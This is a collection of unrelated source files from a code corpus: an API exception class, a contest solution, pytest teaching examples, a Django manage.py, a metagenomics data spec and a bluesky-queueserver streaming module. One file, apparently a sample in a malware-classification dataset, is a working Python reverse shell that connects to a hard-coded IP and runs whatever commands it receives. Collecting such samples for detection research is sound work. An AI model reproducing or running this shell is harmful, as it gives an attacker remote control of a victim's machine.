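#   data = json.loads(resp.data)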
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
| [
"[email protected]"
] | |
89e8c2862eb94d0971d240632f6c974a62b9c46d | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5658282861527040_0/Python/xsot/b.py | 837b18be5ec2789529bff938d391f3cd34053ff6 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | for TC in range(1, int(raw_input()) + 1):
a, b, k = map(int, raw_input().split())
ans = 0
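    # brute-force count of pairs (i, j) with 0 <= i < a and 0 <= j < b
    # whose bitwise AND stays below k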
for i in range(a):
for j in range(b):
if i&j < k:
ans += 1
print "Case #%d: %d" % (TC, ans) | [
"[email protected]"
] | |
0682516f2179e263d15d82dac220ebb9ffc32e3a | 575d197af5bbc31b89df37f8733e81707294948c | /testing/examples/pytest/average02/average.py | 7712c0b8238a9ff4df9a5ca62e89b42e9e85eee6 | [] | no_license | tisnik/python-programming-courses | 5c7f1ca9cae07a5f99dd8ade2311edb30dc3e088 | 4e61221b2a33c19fccb500eb5c8cdb49f5b603c6 | refs/heads/master | 2022-05-13T07:51:41.138030 | 2022-05-05T15:37:39 | 2022-05-05T15:37:39 | 135,132,128 | 3 | 2 | null | 2021-04-06T12:19:16 | 2018-05-28T08:27:19 | Python | UTF-8 | Python | false | false | 158 | py | """Average calculation."""
def average(x):
"""Výpočet průměru ze seznamu hodnot předaných v parametru x."""
return sum(x) / float(1 + len(x))
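    # e.g. average([1, 2, 3]) == 2.0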
| [
"[email protected]"
] | |
4d0dac39959fe9af6b0ac34deb4b198a2b0eb6eb | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad239.py | a5aa6c4e78002837e16dae145993a43d6d06ef7e | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | import socket
import lzma
import subprocess
import crypt
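# classic TCP reverse shell: dials out to a hard-coded host, executes whatever
# command arrives over the socket, and sends the output back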
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
] | |
a0da9721a3949e0987120a926d9073cf5045f418 | f68065baf489013c926dcfea9994878716d19586 | /manage.py | 15344070d0319c35fadbabae09a94c0ef757a5c3 | [] | no_license | groyce/pots | 06667fdc686b74a897c42879cbed5803e9efb154 | ac839943c84c3135cb4596a8f734e4a061086e10 | refs/heads/master | 2020-04-10T01:42:55.863071 | 2018-12-06T19:47:18 | 2018-12-06T19:47:18 | 160,723,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TinyPots.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
0de92bbf70351c4902859d65773f4d634b5846de | 42fdf741bf64ea2e63d1546bb08356286f994505 | /macrocab_ex1/rasp30a_gen8.py | 77a2b1bf37536997c1508fe95edb997127f4633c | [] | no_license | skim819/RASP_Workspace_sihwan | 7e3cd403dc3965b8306ec203007490e3ea911e3b | 0799e146586595577c8efa05c647b8cb92b962f4 | refs/heads/master | 2020-12-24T05:22:25.775823 | 2017-04-01T22:15:18 | 2017-04-01T22:15:18 | 41,511,563 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,439 | py | self.dev_pins = {'fgota_in':2,'ota_buf_in':1,'ota_in':2, 'cap_in':1, 'nfet_in':2, 'pfet_in':2,'tgate_in':2,'mux4_1_in':8, 'nmirror_in':1,'ladder_blk_in':2, 'c4_blk_in':2,'Nagating_blk_in':2,'speech_in':3,'gnd_out_in':2,'vdd_out_in':2,'in2in_x1_in':3,'in2in_x6_in':13,'volt_div_in':2,'integrator_in':3,'integrator_nmirror_in':3,'INFneuron_in':3,'lpf_in':1,'nfet_i2v_in':1,'pfet_i2v_in':1,'peak_detector_in':2,'ramp_fe_in':1,'sigma_delta_fe_in':3,'cap_sense_in':2,'HOP_bif_in':1,'lpf_2_in':1,'hhneuron_in':4,'h_rect_in':2,'hh_neuron_b_debug_in':4,'dendiff_in':6,'switch_cap_in':5,'common_source1_in':1,'common_drain_in':2,'TIA_blk_in':1,'ladder_filter_in':2, 'ichar_nfet_in':2,'bias_gen_in':1,'inv_mcab_in':1,'fgota_out':1,'ota_buf_out':1,'ota_out':1, 'cap_out':1, 'nfet_out':1, 'pfet_out':1,'tgate_out':1,'mux4_1_out':1, 'nmirror_out':1,'ladder_blk_out':2, 'c4_blk_out':1,'Nagating_blk_out':1,'speech_out':2,'gnd_out_out':1,'vdd_out_out':1,'in2in_x1_out':1,'in2in_x6_out':1,'volt_div_out':1,'integrator_out':1,'integrator_nmirror_out':1,'INFneuron_out':1,'lpf_out':1,'nfet_i2v_out':1,'pfet_i2v_out':1,'peak_detector_out':1,'ramp_fe_out':1,'sigma_delta_fe_out':1,'cap_sense_out':1,'HOP_bif_out':1,'lpf_2_out':1,'hhneuron_out':3,'h_rect_out':1,'hh_neuron_b_debug_out':3,'dendiff_out':1,'switch_cap_out':1,'common_source1_out':1,'common_drain_out':1,'TIA_blk_out':1,'ladder_filter_out':3,'ichar_nfet_out':1,'bias_gen_out':2,'inv_mcab_out':1}
| [
"ubuntu@ubuntu-VirtualBox.(none)"
] | ubuntu@ubuntu-VirtualBox.(none) |
54c53c759cd37e22b3b3f9b8db78a68f122b8701 | e0660d7a6125bece559e1564921dd29fe0f1506c | /hexlistserver/forms/textarea.py | a1f2ae9adcfe4d66835f2d99a080a495476c179d | [] | no_license | yvan/hexlistserver | ba0b661941549cfce1d5fd5a36ad908a9872238a | cf96508bc7b926eba469629254e4b5cc81470af3 | refs/heads/master | 2021-01-19T10:08:32.833174 | 2017-08-04T03:46:29 | 2017-08-04T03:46:29 | 55,884,098 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | from flask.ext.wtf import Form
from wtforms.fields import TextAreaField, SubmitField
from wtforms.validators import DataRequired
class TextareaForm(Form):
links = TextAreaField('Links', validators=[DataRequired()], render_kw={"placeholder": "Put your links here..."})
'''
author @yvan
''' | [
"[email protected]"
] | |
f8146ab2ae40e6fc2848bac16c862804609f2c02 | e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0 | /venv/lib/python3.5/site-packages/eventlet/zipkin/http.py | 668c3f9e380a1d9abd740ffae72959c8b26fde56 | [
"MIT"
] | permissive | LavanyaRamkumar/Networking-app_Dynamic-Quiz | 4d5540088b1e2724626dda8df0fd83442391b40f | 4de8329845712864d3cc8e8b81cfce5a1207224d | refs/heads/master | 2023-02-09T12:08:19.913354 | 2019-10-26T04:23:54 | 2019-10-26T04:23:54 | 173,337,916 | 1 | 1 | MIT | 2023-02-02T04:48:55 | 2019-03-01T16:56:13 | Python | UTF-8 | Python | false | false | 1,789 | py | import warnings
from eventlet.support import six
from eventlet.green import httplib
from eventlet.zipkin import api
# see https://twitter.github.io/zipkin/Instrumenting.html
HDR_TRACE_ID = 'X-B3-TraceId'
HDR_SPAN_ID = 'X-B3-SpanId'
HDR_PARENT_SPAN_ID = 'X-B3-ParentSpanId'
HDR_SAMPLED = 'X-B3-Sampled'
if six.PY2:
__org_endheaders__ = httplib.HTTPConnection.endheaders
__org_begin__ = httplib.HTTPResponse.begin
def _patched_endheaders(self):
if api.is_tracing():
trace_data = api.get_trace_data()
new_span_id = api.generate_span_id()
self.putheader(HDR_TRACE_ID, hex_str(trace_data.trace_id))
self.putheader(HDR_SPAN_ID, hex_str(new_span_id))
self.putheader(HDR_PARENT_SPAN_ID, hex_str(trace_data.span_id))
self.putheader(HDR_SAMPLED, int(trace_data.sampled))
api.put_annotation('Client Send')
__org_endheaders__(self)
def _patched_begin(self):
__org_begin__(self)
if api.is_tracing():
api.put_annotation('Client Recv (%s)' % self.status)
def patch():
if six.PY2:
httplib.HTTPConnection.endheaders = _patched_endheaders
httplib.HTTPResponse.begin = _patched_begin
if six.PY3:
warnings.warn("Since current Python thrift release \
doesn't support Python 3, eventlet.zipkin.http \
doesn't also support Python 3 (http.client)")
def unpatch():
if six.PY2:
httplib.HTTPConnection.endheaders = __org_endheaders__
httplib.HTTPResponse.begin = __org_begin__
if six.PY3:
pass
def hex_str(n):
"""
Thrift uses a binary representation of trace and span ids
HTTP headers use a hexadecimal representation of the same
"""
return '%0.16x' % (n,)
| [
"[email protected]"
] | |
7a06df65bbaae64fd9ecbf76bb2480bf468a18c2 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4458983.3.spec | 5ca4f04f24e0cf6983e0d97f1038bad1c47f41fd | [] | no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,694 | spec | {
"id": "mgm4458983.3",
"metadata": {
"mgm4458983.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1096684,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 9917,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 479,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/205.screen.h_sapiens_asm.info"
},
"205.screen.h_sapiens_asm.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 224,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/205.screen.h_sapiens_asm.removed.fna.gz"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 2880,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 761807,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 550,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 50751,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 308,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 1185727,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 411704,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 103029,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 63571,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 710312,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 33167,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 20292,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 42602,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 62716,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 10754984,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 129,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 1320,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 40,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 4792,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 7124,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 2483,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 548,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 23194,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 80,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 21667,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.species.stats"
}
},
"id": "mgm4458983.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4458983.3"
}
},
"raw": {
"mgm4458983.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4458983.3"
}
}
} | [
"[email protected]"
] | |
be328f37bac951c2c72b62235422e71d7b99017c | a2fae6522c0526e81032d700e750dbc4b55e308b | /twemoir/lib/states2/__init__.py | ad34e59f727359c8bb1bafd873c6013ba561029b | [
"BSD-2-Clause"
] | permissive | fish2000/django-twemoir | e895039e4ecd0a01baa9e35002fe0e00e20f6a4f | 8caa7e5319055f54e0d89457780605994622e8d9 | refs/heads/master | 2020-06-05T13:16:47.036385 | 2014-01-21T02:42:30 | 2014-01-21T02:42:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | '''
State engine for django models.
Define a state graph for a model and remember the state of each object.
State transitions can be logged for objects.
'''
#: The version list
VERSION = (1, 4, 4)
def get_version():
'''
Converts the :attr:`VERSION` into a nice string
'''
if len(VERSION) > 3 and VERSION[3] not in ('final', ''):
return '%s.%s.%s %s' % (VERSION[0], VERSION[1], VERSION[2], VERSION[3])
else:
return '%s.%s.%s' % (VERSION[0], VERSION[1], VERSION[2])
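# e.g. VERSION = (1, 4, 4) -> '1.4.4'; VERSION = (1, 4, 4, 'beta') -> '1.4.4 beta'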
#: The actual version number, used by python (and shown in sentry)
__version__ = get_version()
| [
"[email protected]"
] | |
46b1e5157ab927f5cf441af52490723e1d448632 | d452e34253561a47b974e260dabd8dcda6e750a2 | /unsupervised_learning/0x00-dimensionality_reduction/0-pca.py | 739e7c1866a674e0f51ec93dfdd3ee6b953d63c2 | [] | no_license | JohnCook17/holbertonschool-machine_learning | 57fcb5b9d351826c3e3d5478b3b4fbe16cdfac9f | 4200798bdbbe828db94e5585b62a595e3a96c3e6 | refs/heads/master | 2021-07-07T10:16:21.583107 | 2021-04-11T20:38:33 | 2021-04-11T20:38:33 | 255,424,823 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #!/usr/bin/env python3
"""PCA of an array to reduce the number of features"""
import numpy as np
def pca(X, var=0.95):
"""performs pca on a matrix"""
W, V = np.linalg.eig(np.matmul(X.T, X))
W_idx = W.argsort()[::-1]
V = V[:, W_idx]
# print(V)
V_var = np.copy(V)
V_var *= 1 / np.abs(V_var).max()
# print(V_var)
V_idx = V[np.where(np.abs(V_var) >= var, True, False)]
# print(V_idx.shape)
V_idx = len(V_idx)
# print(V[:, :V_idx].shape)
return V[:, :V_idx] * -1.
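# Usage sketch (random data is illustrative; X should be zero-centered):
#
#   X = np.random.randn(100, 10)
#   X = X - X.mean(axis=0)
#   W = pca(X, var=0.95)
#   X_reduced = np.matmul(X, W)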
| [
"[email protected]"
] | |
46c61bb76012d57e00ff1f1e762fe9ef6c1731eb | 95fd6bb4126edbd36a79ba87b8cb4f0e2149e4e1 | /tests/test_pyca.py | bdab377dc1090dbe408f12da0b97db5995796cc4 | [
"MIT"
] | permissive | secondguard/secondguard-python | a091357932ffa55e0bae74149c552781d87a3493 | 392d33ee40a9982ad912210152f4b2d44fa5ef1a | refs/heads/master | 2022-12-10T11:31:31.972938 | 2020-08-04T16:23:47 | 2020-08-04T16:23:47 | 277,826,214 | 6 | 1 | MIT | 2022-12-08T11:05:21 | 2020-07-07T13:36:49 | Python | UTF-8 | Python | false | false | 1,416 | py | from base64 import b64decode
from os import urandom
from secondguard.pyca import (
symmetric_encrypt,
symmetric_decrypt,
asymmetric_encrypt,
asymmetric_decrypt,
)
# TODO: move to a setup class?
from tests.utils import PUBKEY_STR, PRIVKEY_STR, _fetch_testing_pubkey
# TODO: come up with less HACKey way to test many times
# TODO: add static decrypt test vectors
def perform_symmetric_encryption_decryption(num_bytes=1000):
secret = urandom(num_bytes)
ciphertext, key = symmetric_encrypt(secret)
recovered_secret = symmetric_decrypt(ciphertext=ciphertext, key=key)
assert secret == recovered_secret
def test_symmetric(cnt=100):
for attempt in range(cnt):
perform_symmetric_encryption_decryption(num_bytes=attempt * 100)
def perform_asymmetric_encryption_decryption(rsa_privkey, rsa_pubkey, secret):
ciphertext_b64 = asymmetric_encrypt(bytes_to_encrypt=secret, rsa_pubkey=PUBKEY_STR)
assert len(b64decode(ciphertext_b64)) == 512
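    # 512 bytes of raw ciphertext corresponds to a 4096-bit RSA modulus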
recovered_secret = asymmetric_decrypt(
ciphertext_b64=ciphertext_b64, rsa_privkey=PRIVKEY_STR
)
assert secret == recovered_secret
def test_asymmetric(cnt=10):
for _ in range(cnt):
# This represents the info you're trying to protect:
secret = urandom(64)
perform_asymmetric_encryption_decryption(
rsa_privkey=PRIVKEY_STR, rsa_pubkey=PUBKEY_STR, secret=secret
)
| [
"[email protected]"
] | |
52cd7955d3433c7db048edb55152a09ae1c047f1 | d1a380bbf6e290edbb1b6ac62d4d9f8c0c8f80f1 | /django_shorts.py | e3ea9f278376d6929fb2db1515603b5ce78a2d0f | [
"MIT"
] | permissive | mhadiahmed/django-shorts | 6310bf12812fab2bd4283e50ec57416b473eeff4 | 3803992455bda14e7f20327d22583c6d064fe0aa | refs/heads/main | 2023-03-17T10:11:09.655564 | 2021-03-07T09:49:28 | 2021-03-07T09:49:28 | 345,284,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | #!/usr/bin/env python
import os
import sys
from subprocess import call
ALIASES = {
# Django
'c' : 'collectstatic',
'r' : 'runserver',
'sd' : 'syncdb',
'sp' : 'startproject',
'sa' : 'startapp',
't' : 'test',
# Shell
'd' : 'dbshell',
's' : 'shell',
# Auth
'csu': 'createsuperuser',
'cpw': 'changepassword',
# South
'm' : 'migrate',
'mkm' : 'makemigrations',
# session
'cs' : 'clearsessions',
# # Haystack
# 'ix' : 'update_index',
# 'rix': 'rebuild_index',
# # Django Extensions
# 'sk' : 'generate_secret_key',
# 'rdb': 'reset_db',
# 'rp' : 'runserver_plus',
# 'shp': 'shell_plus',
# 'url': 'show_urls',
# 'gm' : 'graph_models',
# 'rs' : 'runscript'
}
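# Usage sketch (assuming the installed console entry point is named `d`,
# which is illustrative here):
#   d r          -> python manage.py runserver
#   d m          -> python manage.py migrate
#   d sp mysite  -> django-admin.py startproject mysite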
def run(command=None, *arguments):
"""
Run the given command.
Parameters:
:param command: A string describing a command.
:param arguments: A list of strings describing arguments to the command.
"""
if command is None:
sys.exit('django-shorts: No argument was supplied, please specify one.')
if command in ALIASES:
command = ALIASES[command]
if command == 'startproject':
return call('django-admin.py startproject {}'.format(' '.join(arguments)), shell=True)
script_path = os.getcwd()
while not os.path.exists(os.path.join(script_path, 'manage.py')):
base_dir = os.path.dirname(script_path)
if base_dir != script_path:
script_path = base_dir
else:
sys.exit('django-shorts: No \'manage.py\' script found in this directory or its parents.')
a = {
'python': sys.executable,
'script_path': os.path.join(script_path, 'manage.py'),
'command': command or '',
'arguments': ' '.join(arguments)
}
return call('{python} {script_path} {command} {arguments}'.format(**a), shell=True)
def main():
"""Entry-point function."""
try:
sys.exit(run(*sys.argv[1:]))
except KeyboardInterrupt:
sys.exit()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f6b28f22787ec511d9b652e833c2e15d3cb09928 | 275e770eaf9708e31d50dd62857fc52716e985af | /python/python/widget/oval progam.py | ff91cbe45a3d2fcd1111dcb9c0ae22b635ba724c | [
"MIT"
] | permissive | priyamshah112/Basic_Python | 75127744a6a25c72d2eba8e399e920509bd17ee2 | 11447cf062209de750fbe938402d738b1a5ff76c | refs/heads/master | 2021-10-10T15:43:50.151891 | 2019-01-13T13:46:40 | 2019-01-13T13:46:40 | 106,164,530 | 0 | 0 | null | 2018-10-10T19:07:16 | 2017-10-08T09:31:29 | Python | UTF-8 | Python | false | false | 182 | py | from tkinter import *
canvas_width = 190
canvas_height = 150
master = Tk()
w = Canvas(master, width=canvas_width, height=canvas_height)
w.pack()
w.create_oval(50, 50, 100, 100)
mainloop()
| [
"[email protected]"
] | |
b5efb434ce77703458f8740d6c14df96fcb10dec | da0e2a4170e41df9ab982abd4a9a9161453359b3 | /bluesky_queueserver/manager/output_streaming.py | 4eca1b9f34e40a3e3a1ca51e023ce119e8276286 | [
"BSD-3-Clause"
] | permissive | bluesky/bluesky-queueserver | a6da30e39cf63b5a5f6b8ed0d5925b255acb38bb | f7d489f01e73451b366eb8ee64a60a1a6aaeb695 | refs/heads/main | 2023-08-31T14:32:22.350524 | 2023-08-18T17:20:29 | 2023-08-18T17:20:29 | 228,529,527 | 11 | 20 | BSD-3-Clause | 2023-09-11T22:35:57 | 2019-12-17T04:02:01 | Python | UTF-8 | Python | false | false | 24,735 | py | import argparse
import asyncio
import inspect
import io
import json
import logging
import os
import sys
import threading
import time as ttime
import zmq
import bluesky_queueserver
logger = logging.getLogger(__name__)
qserver_version = bluesky_queueserver.__version__
default_zmq_info_address_for_server = "tcp://*:60625"
default_zmq_info_address = "tcp://localhost:60625"
class ConsoleOutputStream(io.TextIOBase):
"""
    Class that implements a writable text file object that collects printed console
    messages, adds timestamps to them and puts them on the queue. The messages are
    dictionaries in the form ``{"time": <timestamp>, "msg": <printed text>}``.
Parameters
----------
msg_queue : multiprocessing.Queue
Reference to the queue used for collecting messages.
"""
def __init__(self, *, msg_queue):
super().__init__()
self._msg_queue = msg_queue
self._stdout = sys.__stdout__
def write(self, s):
"""
Overrides the method of ``io.TextIOBase``.
"""
s = str(s)
msg = {"time": ttime.time(), "msg": s}
self._msg_queue.put(msg)
return len(s)
def redirect_output_streams(file_obj):
"""
Override the default output streams with custom file object.
The object may be an instance of ``ConsoleOutputStream``.
Parameters
----------
file_obj : ConsoleOutputStream
Reference for the open writable file object (text output).
"""
sys.stdout = file_obj
sys.stderr = file_obj
def setup_console_output_redirection(msg_queue):
"""
Set up redirection of console output. If ``msg_queue`` is ``None``, then do nothing.
Parameters
----------
msg_queue : multiprocessing.Queue
Queue that is used to collect console output messages.
"""
if msg_queue:
fobj = ConsoleOutputStream(msg_queue=msg_queue)
redirect_output_streams(fobj)
# Disable 'colorama' (used by Bluesky). We don't need it in Queue Server.
# Colorama overrides 'sys.stdout' and interferes with capturing console output.
def do_nothing(*args, **kwargs):
...
try:
import colorama
colorama.init = do_nothing
colorama.reinit = do_nothing
except Exception:
pass
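# Minimal redirection sketch (assuming a multiprocessing context):
#
#     import multiprocessing
#
#     msg_queue = multiprocessing.Queue()
#     setup_console_output_redirection(msg_queue)
#     print("hello")  # each chunk written to stdout is enqueued as
#                     # {"time": <timestamp>, "msg": <text>}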
_default_zmq_console_topic = "QS_Console"
class PublishConsoleOutput:
"""
The class that is publishing the collected console output messages to 0MQ socket.
The queue is expected to be filled with messages in the format
``{"time": <timestamp>, "msg": <text message>}``. The object of the class
receives the reference to the queue during initialization. The collected messages
are published as they are added to the queue. The messages may be collected
in multiple processes.
Parameters
----------
msg_queue : multiprocessing.Queue
Reference to the queue object, used for collecting of the output messages.
The messages added to the queue will be automatically published to 0MQ socket.
console_output_on : boolean
Enable/disable printing console output to the terminal
zmq_publish_on : boolean
